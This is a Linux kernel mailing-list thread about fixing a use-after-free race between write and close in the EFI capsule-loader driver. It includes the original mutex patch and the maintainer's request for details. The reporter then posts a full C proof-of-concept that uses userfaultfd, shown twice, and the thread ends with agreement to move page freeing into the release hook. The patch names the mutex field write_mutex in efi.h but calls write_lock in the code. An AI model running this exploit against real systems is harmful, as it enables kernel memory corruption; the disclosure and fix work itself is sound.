Message ID | 20220626103248.GA57385@ubuntu |
---|---|
State | Superseded |
Headers | show |
Series | efi/capsule-loader: Fix use-after-free in efi_capsule_write | expand |
On Sun, 26 Jun 2022 at 12:32, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > If the user calls close() during a copy operation in copy_from_user() of efi_capsule_write(), > a race condition may occur in which the user's buffer is copied to the freed page. > > This is because .flush of file_operations is called unconditionally > regardless of ->f_count, unlike .release. > > This driver is writable only with root privileges, so it is not a security vulnerability. > However, it is recommended to add mutexes to efi_capsule_write() and efi_capsule_flush() > as root can accidentally break the page while in use. > Apologies for the late reply. Could you please elaborate? I.e., describe in more detail how the race condition may occur? Thanks, > Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com> > --- > drivers/firmware/efi/capsule-loader.c | 12 ++++++++++++ > include/linux/efi.h | 1 + > 2 files changed, 13 insertions(+) > > diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c > index 4dde8edd53b6..e50ede51ef38 100644 > --- a/drivers/firmware/efi/capsule-loader.c > +++ b/drivers/firmware/efi/capsule-loader.c > @@ -177,6 +177,8 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, > if (count == 0) > return 0; > > + mutex_lock(&cap_info->write_lock); > + > /* Return error while NO_FURTHER_WRITE_ACTION is flagged */ > if (cap_info->index < 0) > return -EIO; > @@ -233,12 +235,16 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, > goto failed; > } > > + mutex_unlock(&cap_info->write_lock); > + > return write_byte; > > fail_unmap: > kunmap(page); > failed: > efi_free_all_buff_pages(cap_info); > + mutex_unlock(&cap_info->write_lock); > + > return ret; > } > > @@ -256,12 +262,16 @@ static int efi_capsule_flush(struct file *file, fl_owner_t id) > int ret = 0; > struct capsule_info *cap_info = file->private_data; > > + mutex_lock(&cap_info->write_lock); > + > if (cap_info->index > 0) { > pr_err("capsule upload not complete\n"); > efi_free_all_buff_pages(cap_info); > ret = -ECANCELED; > } > > + mutex_unlock(&cap_info->write_lock); > + > return ret; > } > > @@ -315,6 +325,8 @@ static int efi_capsule_open(struct inode *inode, struct file *file) > return -ENOMEM; > } > > + mutex_init(&cap_info->write_lock); > + > file->private_data = cap_info; > > return 0; > diff --git a/include/linux/efi.h b/include/linux/efi.h > index 7d9b0bb47eb3..e274c4e8d7c6 100644 > --- a/include/linux/efi.h > +++ b/include/linux/efi.h > @@ -204,6 +204,7 @@ struct efi_image_auth { > struct capsule_info { > efi_capsule_header_t header; > efi_capsule_header_t *capsule; > + struct mutex write_mutex; > int reset_type; > long index; > size_t count; > -- > 2.25.1 > > Dear all, > > I submitted this patch 2 weeks ago, this is my 3rd submission of this patch. > > Can I get feedback on this patch? > > Regards, > Hyunwoo Kim.
On Wed, Sep 07, 2022 at 10:30:44AM +0200, Ard Biesheuvel wrote: > Could you please elaborate? I.e., describe in more detail how the race > condition may occur? The exploit flow is as follows: ``` cpu0 cpu1 1. write() . . efi_capsule_write() copy_from_user() <- userfaultfd set 2. close(fd) __x64_sys_close() close_fd() filp_close() filp->f_op->flush(filp, id) efi_capsule_flush() efi_free_all_buff_pages() __free_page() 3. copy_from_user() <- userfaultfd release, UAF ``` 1. Call write to the efi capsule on the thread. It stops at copy_from_user() in efi_capsule_write() because userfaultfd passes the set userspace address when calling write. 2. close() the efi capsule in another thread. This causes the .release callback of efi_capsule_fops to not be called, but the .flush callback to be called. This is because .release of struct file_operations is called only when other operations are finished, whereas .flush is called by the kernel as soon as close() is called. This causes the kernel address that copy_from_user() was copying to be freed by __free_page(). 3. Release userfaultfd from the thread that called write(). This causes a UAF that allows the user to write the desired data to the freed page. + Since userfaultfd only increases the stability of the exploit, UAF will still occur even if userfaultfd is disabled. The poc code that triggers the vulnerability is: ``` #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <stdbool.h> #include <unistd.h> #include <string.h> #include <fcntl.h> #include <pthread.h> #include <errno.h> #include <sched.h> #include <malloc.h> #include <poll.h> #include <pty.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <sys/wait.h> #include <sys/mman.h> #include <sys/socket.h> #include <sys/ipc.h> #include <linux/userfaultfd.h> #define CPU_0 1 #define CPU_1 2 #define CPU_2 3 #define CPU_3 4 #define UFFD_COUNT 1 #define die() do { \ fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \ exit(EXIT_FAILURE); \ } while (0) int fd; int page_size; int set1 = 0; int set2 = 0; char *addr; void set_affinity(unsigned long mask) { if (pthread_setaffinity_np(pthread_self(), sizeof(mask), (cpu_set_t *)&mask) < 0) { perror("pthread_setaffinity_np"); } return; } static void *fault_handler_thread(void *arg) { static struct uffd_msg msg; long uffd; static char *page = NULL; struct uffdio_copy uffdio_copy; ssize_t nwrite; int qid; uintptr_t fault_addr; uffd = (long)arg; if (page == NULL) { page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED){ perror("mmap"); die(); } } for (;;) { struct pollfd pollfd; int nwritey; pollfd.fd = uffd; pollfd.events = POLLIN; nwritey = poll(&pollfd, 1, -1); if (nwritey == -1) { perror("poll"); die(); } nwrite = read(uffd, &msg, sizeof(msg)); if (nwrite == 0) { printf("EOF on userfaultfd!\n"); die(); } if (nwrite == -1) { perror("write"); die(); } if (msg.event != UFFD_EVENT_PAGEFAULT) { perror("Unexpected event on userfaultfd"); die(); } fault_addr = msg.arg.pagefault.address; if (fault_addr == addr) { printf("[step 3] write ufd stuck pid : %d\n", syscall(SYS_gettid)); while(!set1); memset(page, 0x42, page_size); uffdio_copy.src = (unsigned long)page; uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1); uffdio_copy.len = page_size; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) { perror("fault_handler_thwrite() - ioctl-UFFDIO_COPY case 1"); die(); } } } } void set_userfaultfd(void) { long uffd[UFFD_COUNT]; struct uffdio_api uffdio_api[UFFD_COUNT]; struct uffdio_register uffdio_register; pthread_t pf_hdr[UFFD_COUNT]; int p[UFFD_COUNT]; unsigned int size; page_size = sysconf(_SC_PAGE_SIZE); size = page_size; addr = (char *)mmap(NULL, page_size * UFFD_COUNT, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* userfaultfd handler thwrites */ for (int i=0; i<UFFD_COUNT; i++) { uffd[i] = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd[i] == -1) { perror("syscall : userfaultfd"); die(); } uffdio_api[i].api = UFFD_API; uffdio_api[i].features = 0; if (ioctl(uffd[i], UFFDIO_API, &uffdio_api[i]) == -1) { perror("ioctl() : UFFDIO_API"); die(); } uffdio_register.range.start = (unsigned long)(addr + (page_size * i)); uffdio_register.range.len = size; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd[i], UFFDIO_REGISTER, &uffdio_register) == -1) { perror("ioctl() : UFFDIO_REGISTER"); die(); } p[i] = pthread_create(&pf_hdr[i], NULL, fault_handler_thread, (void *)uffd[i]); if (p[i] != 0) { perror("pthread_create : page_fault_handler_thread"); die(); } } } void *efi_write(void) { int ret; set_affinity(CPU_0); printf("[step 2] write before cpu 1 pid : %d\n", syscall(SYS_gettid)); ret = write(fd, addr, 1024); printf("[step 7] write after ret : %d cpu 1 pid : %d\n", ret, syscall(SYS_gettid)); } void *efi_flush(void) { int ret; sleep(5); printf("[step 4] close() before cpu 2 pid : %d\n", syscall(SYS_gettid)); set_affinity(CPU_1); ret = close(fd); sleep(5); /* * * allocate a "page" to be victimized here * */ printf("[step 5] close() after : %d cpu 2 pid : %d\n", ret, syscall(SYS_gettid)); sleep(5); set1 = 1; printf("[step 6] write ufd end cpu 2 pid : %d\n", syscall(SYS_gettid)); } int main() { pthread_t pf_hdr; int p1, p2; int status1, status2; pthread_t hdr1, hdr2; //set_affinity(CPU_0); set_userfaultfd(); fd = open("/dev/efi_capsule_loader", O_WRONLY); printf("[step 1] open fd = %d cpu 0 pid : %d\n", fd, syscall(SYS_gettid)); p1 = pthread_create(&hdr1, NULL, efi_write, (void *)NULL); if (p1 != 0) { perror("pthread_create 1"); die(); } p2 = pthread_create(&hdr2, NULL, efi_flush, (void *)NULL); if (p2 != 0) { perror("pthread_create 2"); die(); } pthread_join(hdr1, (void **)&status1); pthread_join(hdr2, (void **)&status2); printf("done pid : %d\n", syscall(SYS_gettid)); return 0; } ``` Since the description of the patch I sent you earlier is ambiguous, and the current include/linux/efi.h code has changed, I will send you the v2 patch again. Regards, Hyunwoo Kim.
On Wed, 7 Sept 2022 at 12:29, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > On Wed, Sep 07, 2022 at 10:30:44AM +0200, Ard Biesheuvel wrote: > > Could you please elaborate? I.e., describe in more detail how the race > > condition may occur? > > The exploit flow is as follows: > ``` > cpu0 cpu1 > 1. write() > . > . > efi_capsule_write() > copy_from_user() <- userfaultfd set > 2. close(fd) > __x64_sys_close() > close_fd() > filp_close() > filp->f_op->flush(filp, id) > efi_capsule_flush() > efi_free_all_buff_pages() > __free_page() > 3. copy_from_user() <- userfaultfd release, UAF > ``` > > 1. Call write to the efi capsule on the thread. > It stops at copy_from_user() in efi_capsule_write() > because userfaultfd passes the set userspace address when calling write. > > 2. close() the efi capsule in another thread. > This causes the .release callback of efi_capsule_fops to not be called, > but the .flush callback to be called. > This is because .release of struct file_operations is called only when other operations are finished, > whereas .flush is called by the kernel as soon as close() is called. > This causes the kernel address that copy_from_user() was copying to be freed by __free_page(). > > 3. Release userfaultfd from the thread that called write(). > This causes a UAF that allows the user to write the desired data to the freed page. > > + Since userfaultfd only increases the stability of the exploit, UAF will still occur even if userfaultfd is disabled. > > > The poc code that triggers the vulnerability is: > ``` > #include <stdio.h> > #include <stdlib.h> > #include <stdint.h> > #include <stdbool.h> > #include <unistd.h> > #include <string.h> > #include <fcntl.h> > #include <pthread.h> > #include <errno.h> > #include <sched.h> > #include <malloc.h> > #include <poll.h> > #include <pty.h> > #include <sys/syscall.h> > #include <sys/ioctl.h> > #include <sys/wait.h> > #include <sys/mman.h> > #include <sys/socket.h> > #include <sys/ipc.h> > #include <linux/userfaultfd.h> > > > #define CPU_0 1 > #define CPU_1 2 > #define CPU_2 3 > #define CPU_3 4 > #define UFFD_COUNT 1 > > #define die() do { \ > fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \ > exit(EXIT_FAILURE); \ > } while (0) > > > int fd; > int page_size; > int set1 = 0; > int set2 = 0; > char *addr; > > > void set_affinity(unsigned long mask) { > if (pthread_setaffinity_np(pthread_self(), sizeof(mask), (cpu_set_t *)&mask) < 0) { > perror("pthread_setaffinity_np"); > } > > return; > } > > static void *fault_handler_thread(void *arg) { > static struct uffd_msg msg; > long uffd; > static char *page = NULL; > struct uffdio_copy uffdio_copy; > ssize_t nwrite; > int qid; > uintptr_t fault_addr; > > uffd = (long)arg; > > if (page == NULL) { > page = mmap(NULL, page_size, > PROT_READ | PROT_WRITE, > MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); > if (page == MAP_FAILED){ > perror("mmap"); > die(); > } > } > > for (;;) { > struct pollfd pollfd; > int nwritey; > pollfd.fd = uffd; > pollfd.events = POLLIN; > nwritey = poll(&pollfd, 1, -1); > if (nwritey == -1) { > perror("poll"); > die(); > } > > nwrite = read(uffd, &msg, sizeof(msg)); > if (nwrite == 0) { > printf("EOF on userfaultfd!\n"); > die(); > } > > if (nwrite == -1) { > perror("write"); > die(); > } > > if (msg.event != UFFD_EVENT_PAGEFAULT) { > perror("Unexpected event on userfaultfd"); > die(); > } > > fault_addr = msg.arg.pagefault.address; > > if (fault_addr == addr) { > > printf("[step 3] write ufd stuck pid : %d\n", syscall(SYS_gettid)); > > while(!set1); > > memset(page, 0x42, page_size); > > uffdio_copy.src = (unsigned long)page; > uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1); > uffdio_copy.len = page_size; > uffdio_copy.mode = 0; > uffdio_copy.copy = 0; > if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) { > perror("fault_handler_thwrite() - ioctl-UFFDIO_COPY case 1"); > die(); > } > } > } > } > > void set_userfaultfd(void) { > long uffd[UFFD_COUNT]; > struct uffdio_api uffdio_api[UFFD_COUNT]; > struct uffdio_register uffdio_register; > pthread_t pf_hdr[UFFD_COUNT]; > int p[UFFD_COUNT]; > unsigned int size; > > page_size = sysconf(_SC_PAGE_SIZE); > size = page_size; > > addr = (char *)mmap(NULL, > page_size * UFFD_COUNT, > PROT_READ | PROT_WRITE, > MAP_PRIVATE | MAP_ANONYMOUS, > -1, 0); > > /* userfaultfd handler thwrites */ > for (int i=0; i<UFFD_COUNT; i++) { > uffd[i] = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); > if (uffd[i] == -1) { > perror("syscall : userfaultfd"); > die(); > } > > uffdio_api[i].api = UFFD_API; > uffdio_api[i].features = 0; > if (ioctl(uffd[i], UFFDIO_API, &uffdio_api[i]) == -1) { > perror("ioctl() : UFFDIO_API"); > die(); > } > > uffdio_register.range.start = (unsigned long)(addr + (page_size * i)); > uffdio_register.range.len = size; > uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; > if (ioctl(uffd[i], UFFDIO_REGISTER, &uffdio_register) == -1) { > perror("ioctl() : UFFDIO_REGISTER"); > die(); > } > > p[i] = pthread_create(&pf_hdr[i], NULL, fault_handler_thread, (void *)uffd[i]); > if (p[i] != 0) { > perror("pthread_create : page_fault_handler_thread"); > die(); > } > } > } > > void *efi_write(void) { > int ret; > > set_affinity(CPU_0); > > printf("[step 2] write before cpu 1 pid : %d\n", syscall(SYS_gettid)); > > ret = write(fd, addr, 1024); > > printf("[step 7] write after ret : %d cpu 1 pid : %d\n", ret, syscall(SYS_gettid)); > } > > void *efi_flush(void) { > int ret; > > sleep(5); > > printf("[step 4] close() before cpu 2 pid : %d\n", syscall(SYS_gettid)); > > set_affinity(CPU_1); > ret = close(fd); > > sleep(5); > > /* > * > * allocate a "page" to be victimized here > * > */ > > printf("[step 5] close() after : %d cpu 2 pid : %d\n", ret, syscall(SYS_gettid)); > > sleep(5); > > set1 = 1; > printf("[step 6] write ufd end cpu 2 pid : %d\n", syscall(SYS_gettid)); > } > > > int main() { > pthread_t pf_hdr; > int p1, p2; > int status1, status2; > pthread_t hdr1, hdr2; > > //set_affinity(CPU_0); > > set_userfaultfd(); > > fd = open("/dev/efi_capsule_loader", O_WRONLY); > printf("[step 1] open fd = %d cpu 0 pid : %d\n", fd, syscall(SYS_gettid)); > > p1 = pthread_create(&hdr1, NULL, efi_write, (void *)NULL); > if (p1 != 0) { > perror("pthread_create 1"); > die(); > } > > p2 = pthread_create(&hdr2, NULL, efi_flush, (void *)NULL); > if (p2 != 0) { > perror("pthread_create 2"); > die(); > } > > pthread_join(hdr1, (void **)&status1); > pthread_join(hdr2, (void **)&status2); > > printf("done pid : %d\n", syscall(SYS_gettid)); > > return 0; > } > ``` > > Since the description of the patch I sent you earlier is ambiguous, > and the current include/linux/efi.h code has changed, I will send you the v2 patch again. > Thanks. This is very useful, and I managed to reproduce the issue. As far as your fix is concerned: wouldn't it be better to move the freeing of the pages to the release hook? Semantically, flush is not the right place for this, AFAICT.
On Wed, Sep 07, 2022 at 04:40:08PM +0200, Ard Biesheuvel wrote: > As far as your fix is concerned: wouldn't it be better to move the > freeing of the pages to the release hook? Semantically, flush is not > the right place for this, AFAICT. you're right. Freeing the buffer in .flush is wrong. I also think it's appropriate to move the buffer release part to .release. But looking at the comments, /** * efi_capsule_flush - called by file close or file flush * @file: file pointer * @id: not used * * If a capsule is being partially uploaded then calling this function * will be treated as upload termination and will free those completed * buffer pages and -ECANCELED will be returned. **/ efi_capsule_flush() seems to exist for the purpose of canceling uploads in the middle. If buffer release is moved to .release, will there be any compatibility issues?
On Wed, Sep 07, 2022 at 07:54:26AM -0700, Hyunwoo Kim wrote: > efi_capsule_flush() seems to exist for the purpose of canceling uploads in the middle. > > If buffer release is moved to .release, will there be any compatibility issues? The way to submit capsules is to submit by calling write() multiple times by the user, rather than in a structure that processes the copy operation at once inside efi_capsule_write(). In other words, if you just call close() when you want to cancel upload, .release is automatically called after write() is finished, and upload is stopped. So there is no need for .flush to exist. So I think it would be ok to move the buffer free part to .release. I'll submit you a v4 patch that moves the buffre free part to .release.
On Wed, 7 Sept 2022 at 17:17, Hyunwoo Kim <imv4bel@gmail.com> wrote: > > On Wed, Sep 07, 2022 at 07:54:26AM -0700, Hyunwoo Kim wrote: > > efi_capsule_flush() seems to exist for the purpose of canceling uploads in the middle. > > > > If buffer release is moved to .release, will there be any compatibility issues? > > The way to submit capsules is to submit by calling write() multiple times by the user, > rather than in a structure that processes the copy operation at once inside efi_capsule_write(). > In other words, if you just call close() when you want to cancel upload, > .release is automatically called after write() is finished, and upload is stopped. > So there is no need for .flush to exist. > > So I think it would be ok to move the buffer free part to .release. > > I'll submit you a v4 patch that moves the buffre free part to .release. OK
diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c index 4dde8edd53b6..e50ede51ef38 100644 --- a/drivers/firmware/efi/capsule-loader.c +++ b/drivers/firmware/efi/capsule-loader.c @@ -177,6 +177,8 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, if (count == 0) return 0; + mutex_lock(&cap_info->write_lock); + /* Return error while NO_FURTHER_WRITE_ACTION is flagged */ if (cap_info->index < 0) return -EIO; @@ -233,12 +235,16 @@ static ssize_t efi_capsule_write(struct file *file, const char __user *buff, goto failed; } + mutex_unlock(&cap_info->write_lock); + return write_byte; fail_unmap: kunmap(page); failed: efi_free_all_buff_pages(cap_info); + mutex_unlock(&cap_info->write_lock); + return ret; } @@ -256,12 +262,16 @@ static int efi_capsule_flush(struct file *file, fl_owner_t id) int ret = 0; struct capsule_info *cap_info = file->private_data; + mutex_lock(&cap_info->write_lock); + if (cap_info->index > 0) { pr_err("capsule upload not complete\n"); efi_free_all_buff_pages(cap_info); ret = -ECANCELED; } + mutex_unlock(&cap_info->write_lock); + return ret; } @@ -315,6 +325,8 @@ static int efi_capsule_open(struct inode *inode, struct file *file) return -ENOMEM; } + mutex_init(&cap_info->write_lock); + file->private_data = cap_info; return 0; diff --git a/include/linux/efi.h b/include/linux/efi.h index 7d9b0bb47eb3..e274c4e8d7c6 100644 --- a/include/linux/efi.h +++ b/include/linux/efi.h @@ -204,6 +204,7 @@ struct efi_image_auth { struct capsule_info { efi_capsule_header_t header; efi_capsule_header_t *capsule; + struct mutex write_mutex; int reset_type; long index; size_t count;
If the user calls close() during a copy operation in copy_from_user() of efi_capsule_write(), a race condition may occur in which the user's buffer is copied to the freed page. This is because .flush of file_operations is called unconditionally regardless of ->f_count, unlike .release. This driver is writable only with root privileges, so it is not a security vulnerability. However, it is recommended to add mutexes to efi_capsule_write() and efi_capsule_flush() as root can accidentally break the page while in use. Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com> --- drivers/firmware/efi/capsule-loader.c | 12 ++++++++++++ include/linux/efi.h | 1 + 2 files changed, 13 insertions(+)